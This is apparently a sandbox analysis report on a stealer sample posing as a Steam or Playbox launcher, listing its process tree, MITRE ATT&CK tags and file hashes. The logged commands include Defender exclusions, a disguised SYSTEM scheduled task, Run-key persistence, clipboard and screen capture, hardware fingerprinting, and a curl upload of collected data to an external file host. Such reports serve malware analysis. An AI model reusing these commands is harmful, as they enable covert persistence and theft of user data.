[System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,6,99,59,19,92,149,197,65,145,228,210,141,215,140,131,116,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,165,162,117,116,222,101,115,200,198,214,189,245,245,145,112,137,100,37,252,99,133,68,167,154,134,73,170,205,22,190,20,2,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,234,179,229,152,186,119,58,6,125,108,83,47,218,192,240,123,221,34,151,0,206,114,233,204,166,38,170,69,208,29,245,222,48,0,0,0,65,234,21,156,203,156,10,193,40,122,154,0,187,175,47,36,219,240,254,153,152,79,157,119,242,202,73,181,189,206,175,113,209,54,169,250,74,132,71,138,234,154,73,207,130,9,239,28,64,0,0,0,184,172,213,9,161,199,246,52,21,22,63,113,174,73,169,114,80,71,218,105,64,88,130,68,70,73,183,78,202,229,196,7,113,251,79,57,191,121,31,85,229,109,39,22,249,15,16,107,166,186,144,81,225,232,117,12,181,132,89,212,154,104,235,116), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"2⤵PID:1856
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber3⤵PID:988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"2⤵PID:4428
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f3⤵PID:4272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"2⤵PID:1164
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM3⤵
- Scheduled Task/Job: Scheduled Task
PID:1800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""2⤵
- Hide Artifacts: Hidden Window
PID:2796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:4236 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y35tc3vz\y35tc3vz.cmdline"4⤵PID:1912
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF201.tmp" "c:\Users\Admin\AppData\Local\Temp\y35tc3vz\CSCECD6AEB0B7B48AC8F99B996E6A061CB.TMP"5⤵PID:4456
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:4684
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""2⤵PID:4152
-
C:\Windows\system32\cscript.execscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"3⤵
- Checks computer location settings
PID:1388 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "4⤵PID:2924
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2604
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\Downloads\PlayboxSetup\playbox.exe" /f5⤵
- Adds Run key to start application
- Modifies registry key
PID:4208
-
-
C:\Windows\system32\reg.exereg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"5⤵
- Modifies registry key
PID:1332
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE5⤵PID:4944
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"2⤵PID:2908
-
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get serialnumber3⤵PID:3040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:2984
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:3652
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:1568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"2⤵PID:1832
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_computersystemproduct get uuid3⤵PID:4004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:5040
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:4764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"2⤵PID:1140
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Description,PNPDeviceID3⤵PID:1084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:2080
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"2⤵PID:4344
-
C:\Windows\System32\Wbem\WMIC.exewmic memorychip get serialnumber3⤵PID:1656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"2⤵PID:4904
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:1464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:5012
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵
- Blocklisted process makes network request
PID:3764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"2⤵PID:1012
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get processorid3⤵PID:3292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:2728
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "getmac /NH"2⤵PID:4160
-
C:\Windows\system32\getmac.exegetmac /NH3⤵PID:3908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:3684
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:5044
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:3388
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:4608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:1156
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2136
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:2220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:4060
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:1072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:3764
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:1884
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:736
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:2172
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2180
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:2444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3616
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:2912
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:1656
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:1332
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:5060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""2⤵PID:2236
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:3064
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Rijtoovx.zip";"2⤵PID:1144
-
C:\Windows\system32\curl.execurl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Rijtoovx.zip";3⤵PID:4904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:1232
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵
- Blocklisted process makes network request
PID:692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3020
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:2172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:2024
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2840
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:2492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:1436
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:4152
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2028
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:2368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:4432
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:3636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:1464
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:4808
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:5072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:4524
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:5004
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:3156
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:4456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:1072
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:3764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""2⤵PID:5044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:1980
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:692
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:2984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:4920
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:2708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:4116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:4732
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:4608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3224
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:2556
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:1680
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:4964
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:4860
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:4836
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3024
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:1416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:4896
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:5004
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:2240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:2260
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:4972
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:3860
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:2444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:4684
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:3444
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:928
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:4852
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:2232
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:4060
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:5000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3684
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:5012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:1012
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:4528
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:2892
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:2292
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:892
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD572fc66b925a77dde97ffbe4cedcfd961
SHA1c012c0f8590ff02039d1f0e40214624f3a975b0d
SHA256bf86dc8c52866fb7dc831d9347d2738ca049aaf6d89044d7d1d1ce9df871e581
SHA51289a4ad168ad8e8e61bffa5d548e70e2590eacad51b0b32f07ade15c94fac035f8fa8bac33b1b8fc603361c9ee4680603a080d72c55e5435ef1087a6414379600
-
Filesize
2KB
MD57643f78b05fbfe0db59853596cc31a82
SHA17a97dd8877894c9db706d0de6d5e512c3a704e95
SHA2569bb6fad8d6b7de48fe46da025fde3e9969035f037cb55b5c8d8756a1c1b1aa73
SHA512067cb128beac513d17e7e8b5ba191800e7179827bda98d182bb5605d838918a6aa572749a1ead020b1178f749cce1ed7df5153540f46ad1d1c56c1d8cad5a9a0
-
Filesize
94B
MD52f308e49fe62fbc51aa7a9b987a630fe
SHA11b9277da78babd9c5e248b66ba6ab16c77b97d0b
SHA256d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521
SHA512c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024
-
Filesize
70B
MD58a0ed121ee275936bf62b33f840db290
SHA1898770c85b05670ab1450a96ea6fbd46e6310ef6
SHA256983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709
SHA5127d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154
-
Filesize
15B
MD5675951f6d9d75fd2c9c06b5ff547c6fd
SHA19b474ab39d1e2aad52ea5272dbac7d4f9fe44c09
SHA25660fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244
SHA51244dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea
-
Filesize
78B
MD5c5e74f3120dbbd446a527e785dfe6d66
SHA111997c2a53d19fd20916e49411c7a61bfb590e9c
SHA256e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05
SHA512a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f
-
Filesize
44KB
MD5d2fe94a711dca2e4448727c0617f518d
SHA1e5f2d46ede87b6fcdf41a117632f34e252c52392
SHA2564c5650d687cf8aff477851f8faa939b8933bc0fe647fb243d09e81773d8bf51f
SHA5126149157dcadfa5dddaec5e15eb88e356a210e9aee1f2e43a6507049c4ef925f7b895bd106589a48e3e8d0f2c0b7c168c2c799d2c429eef720c60d481fc0922f2
-
Filesize
506B
MD5c0b8e561807f7dde568fd800b0a56403
SHA188bdf56f86a72f072f6734f0f3822f3490bbbb7c
SHA256ee5a03b21a139d549c6079683c6ccab5acb562f69e1e8902fb432e0ac67bd757
SHA51235edf4204eed8e918a518911e0fc45f659bad71555b01ac2ba1a309a7f8754f20df81fe3b8c1b244f54699506a292f4588c0a6b178605cd62e467e3bfe1b2891
-
Filesize
1KB
MD5c15e070ccfd61de653853b7417002bb8
SHA1b8dfcc4731f9181e0c61dc049e75514dab8fcde7
SHA256a74a1148c902e55fcd49ef7e114ead4d96ca84da267b50d9964152155784b830
SHA5120b92b292a00812630e3f7306735b738893511ad48e8430f243bd34278b351bda3229abb2265b3e95006195aed76cd63cb482496b7552e39e2b94cfca21dc306b
-
Filesize
22B
MD576cdb2bad9582d23c1f6f4d868218d6c
SHA1b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA2568739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA5125e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f
-
Filesize
1KB
MD57758bc35d16284506e39b90ceb0cabd8
SHA173e1c3d4de9a978febb766983340439a7b2ad742
SHA2566ce9b3b1af37b67cc1cf2f81a69bbbf525716baebff036537d3cadaaa04fbec3
SHA512230309a9360f7e8a496616c8f40118ff5c804cb94c93f18a26a8837f633bdb4c79c59b11964dcf1eae85417a3e115c810155737c3403dc5950d576395836beba
-
Filesize
3KB
MD5a8834c224450d76421d8e4a34b08691f
SHA173ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
SHA512672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596
